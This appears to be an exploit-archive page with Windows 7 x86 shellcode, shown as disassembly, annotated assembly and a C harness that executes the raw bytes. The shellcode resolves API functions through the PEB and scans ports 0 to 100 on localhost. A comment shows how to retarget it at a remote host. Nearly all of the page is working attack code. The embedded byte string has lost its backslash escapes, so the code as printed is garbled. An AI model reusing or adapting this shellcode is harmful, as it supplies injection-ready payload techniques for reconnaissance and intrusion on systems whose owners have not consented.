Home / os / win3.11

Windows 7/x86 localhost Port Scanner Shellcode

Posted on 30 November -0001

<HTML><HEAD><TITLE>Windows 7/x86 localhost Port Scanner Shellcode</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* # Title : Windows x86 localhost port scanner shellcode # Date : 29-07-2016 # Author : Roziul Hasan Khan Shifat # Tested on : Windows 7 x86 starter */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 db xor %ebx,%ebx 2: 64 8b 43 30 mov %fs:0x30(%ebx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 58 10 mov 0x10(%eax),%ebx 12: 31 d2 xor %edx,%edx 14: 8b 53 3c mov 0x3c(%ebx),%edx 17: 01 da add %ebx,%edx 19: 8b 52 78 mov 0x78(%edx),%edx 1c: 01 da add %ebx,%edx 1e: 8b 72 20 mov 0x20(%edx),%esi 21: 01 de add %ebx,%esi 23: 31 c9 xor %ecx,%ecx 00000025 <getp>: 25: 41 inc %ecx 26: ad lods %ds:(%esi),%eax 27: 01 d8 add %ebx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 <getp> 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 <getp> 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 <getp> 43: 8b 72 1c mov 0x1c(%edx),%esi 46: 01 de add %ebx,%esi 48: 8b 14 8e mov (%esi,%ecx,4),%edx 4b: 01 da add %ebx,%edx 4d: 31 f6 xor %esi,%esi 4f: 89 d6 mov %edx,%esi 51: 89 df mov %ebx,%edi 53: 31 c9 xor %ecx,%ecx 55: 68 6c 6f 63 41 push $0x41636f6c 5a: 88 4c 24 03 mov %cl,0x3(%esp) 5e: 68 61 6c 41 6c push $0x6c416c61 63: 68 47 6c 6f 62 push $0x626f6c47 68: 54 push %esp 69: 53 push %ebx 6a: ff d2 call *%edx 6c: 83 c4 0c add $0xc,%esp 6f: 31 c9 xor %ecx,%ecx 71: b1 20 mov $0x20,%cl 73: 51 push %ecx 74: 31 c9 xor %ecx,%ecx 76: 51 push %ecx 77: ff d0 call *%eax 79: 89 f1 mov %esi,%ecx 7b: 89 c6 mov %eax,%esi 7d: 89 0e mov %ecx,(%esi) 7f: 31 c9 xor %ecx,%ecx 81: 68 65 65 41 41 push $0x41416565 86: 88 4c 24 02 mov %cl,0x2(%esp) 8a: 68 61 6c 46 72 push $0x72466c61 8f: 68 47 6c 6f 62 push $0x626f6c47 94: 54 push %esp 95: 57 push %edi 96: 8b 16 mov (%esi),%edx 98: ff d2 call *%edx 9a: 83 c4 0c add $0xc,%esp 9d: 89 46 04 mov %eax,0x4(%esi) a0: 31 c9 xor %ecx,%ecx a2: 51 push %ecx a3: 68 61 72 79 41 push $0x41797261 a8: 68 4c 69 62 72 push $0x7262694c ad: 68 4c 6f 61 64 push $0x64616f4c b2: 54 push %esp b3: 57 push %edi b4: 8b 16 mov (%esi),%edx b6: ff d2 call *%edx b8: 83 c4 0c add $0xc,%esp bb: 89 46 08 mov %eax,0x8(%esi) be: 31 c9 xor %ecx,%ecx c0: 68 6c 6c 41 41 push $0x41416c6c c5: 88 4c 24 02 mov %cl,0x2(%esp) c9: 68 72 74 2e 64 push $0x642e7472 ce: 68 6d 73 76 63 push $0x6376736d d3: 54 push %esp d4: ff d0 call *%eax d6: 83 c4 0c add $0xc,%esp d9: 89 c7 mov %eax,%edi db: 31 c9 xor %ecx,%ecx dd: 51 push %ecx de: 68 74 66 5f 73 push $0x735f6674 e3: 68 70 72 69 6e push $0x6e697270 e8: 54 push %esp e9: 50 push %eax ea: 8b 16 mov (%esi),%edx ec: ff d2 call *%edx ee: 83 c4 08 add $0x8,%esp f1: 89 46 0c mov %eax,0xc(%esi) f4: 31 c9 xor %ecx,%ecx f6: 51 push %ecx f7: 68 65 78 69 74 push $0x74697865 fc: 54 push %esp fd: 57 push %edi fe: 8b 16 mov (%esi),%edx 100: ff d2 call *%edx 102: 83 c4 08 add $0x8,%esp 105: 89 46 10 mov %eax,0x10(%esi) 108: 8b 56 08 mov 0x8(%esi),%edx 10b: 31 c9 xor %ecx,%ecx 10d: 68 64 6c 6c 41 push $0x416c6c64 112: 88 4c 24 03 mov %cl,0x3(%esp) 116: 68 6b 33 32 2e push $0x2e32336b 11b: 68 77 73 6f 63 push $0x636f7377 120: 54 push %esp 121: ff d2 call *%edx 123: 83 c4 0c add $0xc,%esp 126: 89 c7 mov %eax,%edi 128: 31 c9 xor %ecx,%ecx 12a: 68 75 70 41 41 push $0x41417075 12f: 88 4c 24 02 mov %cl,0x2(%esp) 133: 68 74 61 72 74 push $0x74726174 138: 68 57 53 41 53 push $0x53415357 13d: 54 push %esp 13e: 50 push %eax 13f: 8b 16 mov (%esi),%edx 141: ff d2 call *%edx 143: 89 46 14 mov %eax,0x14(%esi) 146: 83 c4 0c add $0xc,%esp 149: 68 65 74 41 41 push $0x41417465 14e: 31 c9 xor %ecx,%ecx 150: 88 4c 24 02 mov %cl,0x2(%esp) 154: 68 73 6f 63 6b push $0x6b636f73 159: 54 push %esp 15a: 57 push %edi 15b: 8b 16 mov (%esi),%edx 15d: ff d2 call *%edx 15f: 89 46 18 mov %eax,0x18(%esi) 162: 83 c4 08 add $0x8,%esp 165: 68 65 63 74 41 push $0x41746365 16a: 31 c9 xor %ecx,%ecx 16c: 88 4c 24 03 mov %cl,0x3(%esp) 170: 68 63 6f 6e 6e push $0x6e6e6f63 175: 54 push %esp 176: 57 push %edi 177: 8b 16 mov (%esi),%edx 179: ff d2 call *%edx 17b: 83 c4 08 add $0x8,%esp 17e: 89 46 1c mov %eax,0x1c(%esi) 181: 31 c9 xor %ecx,%ecx 183: 68 6b 65 74 41 push $0x4174656b 188: 88 4c 24 03 mov %cl,0x3(%esp) 18c: 68 65 73 6f 63 push $0x636f7365 191: 68 63 6c 6f 73 push $0x736f6c63 196: 54 push %esp 197: 57 push %edi 198: 8b 16 mov (%esi),%edx 19a: ff d2 call *%edx 19c: 83 c4 0c add $0xc,%esp 19f: 89 46 08 mov %eax,0x8(%esi) 1a2: 8b 56 14 mov 0x14(%esi),%edx 1a5: 31 c9 xor %ecx,%ecx 1a7: 66 b9 90 01 mov $0x190,%cx 1ab: 29 cc sub %ecx,%esp 1ad: 66 b9 02 02 mov $0x202,%cx 1b1: 8d 1c 24 lea (%esp),%ebx 1b4: 53 push %ebx 1b5: 51 push %ecx 1b6: ff d2 call *%edx 1b8: 31 ff xor %edi,%edi 000001ba <scan>: 1ba: 31 d2 xor %edx,%edx 1bc: b2 06 mov $0x6,%dl 1be: 52 push %edx 1bf: 83 ea 05 sub $0x5,%edx 1c2: 52 push %edx 1c3: 42 inc %edx 1c4: 52 push %edx 1c5: 8b 56 18 mov 0x18(%esi),%edx 1c8: ff d2 call *%edx 1ca: 89 c3 mov %eax,%ebx 1cc: 31 d2 xor %edx,%edx 1ce: 52 push %edx 1cf: 52 push %edx 1d0: 52 push %edx 1d1: 52 push %edx 1d2: 31 c0 xor %eax,%eax 1d4: b0 ff mov $0xff,%al 1d6: 40 inc %eax 1d7: f7 e7 mul %edi 1d9: c6 04 24 02 movb $0x2,(%esp) 1dd: 89 44 24 02 mov %eax,0x2(%esp) 1e1: 8d 14 24 lea (%esp),%edx 1e4: 31 c9 xor %ecx,%ecx 1e6: b1 10 mov $0x10,%cl 1e8: 53 push %ebx 1e9: 51 push %ecx 1ea: 52 push %edx 1eb: 53 push %ebx 1ec: 8b 46 1c mov 0x1c(%esi),%eax 1ef: ff d0 call *%eax 1f1: 5b pop %ebx 1f2: 83 c4 10 add $0x10,%esp 1f5: 31 c9 xor %ecx,%ecx 1f7: 51 push %ecx 1f8: 68 20 20 20 0a push $0xa202020 1fd: 68 3e 20 25 64 push $0x6425203e 202: 68 25 64 20 2d push $0x2d206425 207: 54 push %esp 208: 59 pop %ecx 209: 50 push %eax 20a: 57 push %edi 20b: 51 push %ecx 20c: 8b 46 0c mov 0xc(%esi),%eax 20f: ff d0 call *%eax 211: 83 c4 10 add $0x10,%esp 214: 53 push %ebx 215: 8b 46 08 mov 0x8(%esi),%eax 218: ff d0 call *%eax 21a: 47 inc %edi 21b: 83 ff 65 cmp $0x65,%edi 21e: 75 9a jne 1ba <scan> 220: 8b 46 04 mov 0x4(%esi),%eax 223: 8b 7e 10 mov 0x10(%esi),%edi 226: 56 push %esi 227: ff d0 call *%eax 229: 50 push %eax 22a: ff d7 call *%edi */ /* section .text global _start _start: xor ebx,ebx mov eax,[fs:ebx+0x30] mov eax,[eax+0xc] mov esi,[eax+0x14] lodsd xchg esi,eax lodsd mov ebx,[eax+0x10] ;kernel32.dll base address xor edx,edx mov edx,[ebx+0x3c] add edx,ebx mov edx,[edx+0x78] add edx,ebx ;IMAGE_EXPORT_DIRECTORY mov esi,[edx+0x20] add esi,ebx ;AddressOfNames xor ecx,ecx getp: inc ecx lodsd add eax,ebx cmp dword [eax],'GetP' jnz getp cmp dword [eax+4],'rocA' jnz getp cmp dword [eax+8],'ddre' jnz getp mov esi,[edx+0x1c] add esi,ebx ;AddressOfFunctions mov edx,[esi+ecx*4] add edx,ebx ;GetProcAddress() ;---------------------------------- xor esi,esi mov esi,edx ;GetProcAddress() mov edi,ebx ;kernel32 base address ;------------------------------ ;finding address of GlobalAlloc() xor ecx,ecx push 0x41636f6c mov [esp+3],byte cl push 0x6c416c61 push 0x626f6c47 push esp push ebx call edx add esp,12 ;--------------------------- ;GlobalAlloc(0x00,4*8) sizeof every function address 4 byte and i will store address of 8 functions xor ecx,ecx mov cl,32 push ecx xor ecx,ecx push ecx call eax ;-------------------------------- mov ecx,esi mov esi,eax mov [esi],dword ecx ;GetProcAddress() at offset 0 ;---------------------------------- ;finding address of GlobalFree() xor ecx,ecx push 0x41416565 mov [esp+2],byte cl push 0x72466c61 push 0x626f6c47 push esp push edi mov edx,dword [esi] call edx add esp,12 ;---------------------- mov [esi+4],dword eax ;GlobalFree() at offset 4 ;------------------------ ;finding address of LoadLibraryA() xor ecx,ecx push ecx push 0x41797261 push 0x7262694c push 0x64616f4c push esp push edi mov edx,dword [esi] call edx add esp,12 ;---------------------- mov [esi+8],dword eax ;LoadLibraryA() at offset 8 ;------------------------ ;loading msvcrt.dll xor ecx,ecx push 0x41416c6c mov [esp+2],byte cl push 0x642e7472 push 0x6376736d push esp call eax add esp,12 ;------------------------- mov edi,eax ;msvcrt.dll base address ;----------------------- ;finding address of printf() xor ecx,ecx push ecx push 0x735f6674 push 0x6e697270 push esp push eax mov edx,dword [esi] call edx add esp,8 ;---------------------- mov [esi+12],dword eax ;printf() at offset 12 ;--------------------- ;finding address of exit() xor ecx,ecx push ecx push 'exit' push esp push edi mov edx,dword [esi] call edx add esp,8 ;--------------------- mov [esi+16],dword eax ;exit() at offset 16 ;-------------------------------- ;loading wsock32.dll mov edx,dword [esi+8] xor ecx,ecx push 0x416c6c64 mov [esp+3],byte cl push 0x2e32336b push 0x636f7377 push esp call edx add esp,12 ;---------------------- mov edi,eax ;wsock32.dll ;--------------------- ;finding address of WSAStartup() xor ecx,ecx push 0x41417075 mov [esp+2],byte cl push 0x74726174 push 0x53415357 push esp push eax mov edx,dword [esi] call edx ;--------------------- mov [esi+20],dword eax ;WSAStartup() at offset 20 ;---------------------- add esp,12 ;finding address of socket() push 0x41417465 xor ecx,ecx mov [esp+2],byte cl push 0x6b636f73 push esp push edi mov edx,dword [esi] call edx ;------------------------------- mov [esi+24],dword eax ;socket() at offset 24 ;------------------------------ add esp,8 ;finding address connect() push 0x41746365 xor ecx,ecx mov [esp+3],byte cl push 0x6e6e6f63 push esp push edi mov edx,dword [esi] call edx add esp,8 ;------------------------- mov [esi+28],dword eax ;connect() at offset 28 ;--------------------------------- ;finding address of closesocket() xor ecx,ecx push 0x4174656b mov [esp+3],byte cl push 0x636f7365 push 0x736f6c63 push esp push edi mov edx,dword [esi] call edx add esp,12 ;--------------------------- mov [esi+8],dword eax ;closesocket() at offset 8 ;--------------------------------- ;------------------- ;WSAStartup(514,&wsa) mov edx,dword [esi+20] ;edx=WSAStartup() xor ecx,ecx mov cx,400 sub esp,ecx mov cx,514 lea ebx,[esp] push ebx push ecx call edx ;--------------------- xor edi,edi ;port scanning start from 0 - 100 scan: ;socket(2,1,6) xor edx,edx mov dl,6 push edx sub edx,5 push edx inc edx push edx mov edx,dword [esi+24] ;socket() call edx ;---------------------- ;connect() mov ebx,eax ;SOCKET xor edx,edx push edx push edx push edx push edx xor eax,eax mov al,255 inc eax mul edi mov [esp],byte 2 mov [esp+2],word eax ;mov [esp+4],dword 0x81e8a8c0 ;Use it to scan foreign host lea edx,[esp] xor ecx,ecx mov cl,16 push ebx push ecx push edx push ebx mov eax,[esi+28] ;connect() call eax pop ebx ;SOCKET add esp,16 xor ecx,ecx push ecx push 0x0a202020 push 0x6425203e push 0x2d206425 push esp pop ecx push eax push edi push ecx mov eax,dword [esi+12] ;printf() call eax add esp,16 push ebx ;SOCKET mov eax,dword [esi+8] ;closesocket() call eax inc edi cmp edi,101 jne scan mov eax,dword [esi+4] ;GlobalFree() mov edi,dword [esi+16] ;exit() push esi call eax push eax call edi */ #include<stdio.h> #include<string.h> char shellcode[]="x31xdbx64x8bx43x30x8bx40x0cx8bx70x14xadx96xadx8bx58x10x31xd2x8bx53x3cx01xdax8bx52x78x01xdax8bx72x20x01xdex31xc9x41xadx01xd8x81x38x47x65x74x50x75xf4x81x78x04x72x6fx63x41x75xebx81x78x08x64x64x72x65x75xe2x8bx72x1cx01xdex8bx14x8ex01xdax31xf6x89xd6x89xdfx31xc9x68x6cx6fx63x41x88x4cx24x03x68x61x6cx41x6cx68x47x6cx6fx62x54x53xffxd2x83xc4x0cx31xc9xb1x20x51x31xc9x51xffxd0x89xf1x89xc6x89x0ex31xc9x68x65x65x41x41x88x4cx24x02x68x61x6cx46x72x68x47x6cx6fx62x54x57x8bx16xffxd2x83xc4x0cx89x46x04x31xc9x51x68x61x72x79x41x68x4cx69x62x72x68x4cx6fx61x64x54x57x8bx16xffxd2x83xc4x0cx89x46x08x31xc9x68x6cx6cx41x41x88x4cx24x02x68x72x74x2ex64x68x6dx73x76x63x54xffxd0x83xc4x0cx89xc7x31xc9x51x68x74x66x5fx73x68x70x72x69x6ex54x50x8bx16xffxd2x83xc4x08x89x46x0cx31xc9x51x68x65x78x69x74x54x57x8bx16xffxd2x83xc4x08x89x46x10x8bx56x08x31xc9x68x64x6cx6cx41x88x4cx24x03x68x6bx33x32x2ex68x77x73x6fx63x54xffxd2x83xc4x0cx89xc7x31xc9x68x75x70x41x41x88x4cx24x02x68x74x61x72x74x68x57x53x41x53x54x50x8bx16xffxd2x89x46x14x83xc4x0cx68x65x74x41x41x31xc9x88x4cx24x02x68x73x6fx63x6bx54x57x8bx16xffxd2x89x46x18x83xc4x08x68x65x63x74x41x31xc9x88x4cx24x03x68x63x6fx6ex6ex54x57x8bx16xffxd2x83xc4x08x89x46x1cx31xc9x68x6bx65x74x41x88x4cx24x03x68x65x73x6fx63x68x63x6cx6fx73x54x57x8bx16xffxd2x83xc4x0cx89x46x08x8bx56x14x31xc9x66xb9x90x01x29xccx66xb9x02x02x8dx1cx24x53x51xffxd2x31xffx31xd2xb2x06x52x83xeax05x52x42x52x8bx56x18xffxd2x89xc3x31xd2x52x52x52x52x31xc0xb0xffx40xf7xe7xc6x04x24x02x89x44x24x02x8dx14x24x31xc9xb1x10x53x51x52x53x8bx46x1cxffxd0x5bx83xc4x10x31xc9x51x68x20x20x20x0ax68x3ex20x25x64x68x25x64x20x2dx54x59x50x57x51x8bx46x0cxffxd0x83xc4x10x53x8bx46x08xffxd0x47x83xffx65x75x9ax8bx46x04x8bx7ex10x56xffxd0x50xffxd7"; main() { printf("shellcode length %ld ",(unsigned)strlen(shellcode)); (* (int(*)()) shellcode) (); }</BODY></HTML>

 

TOP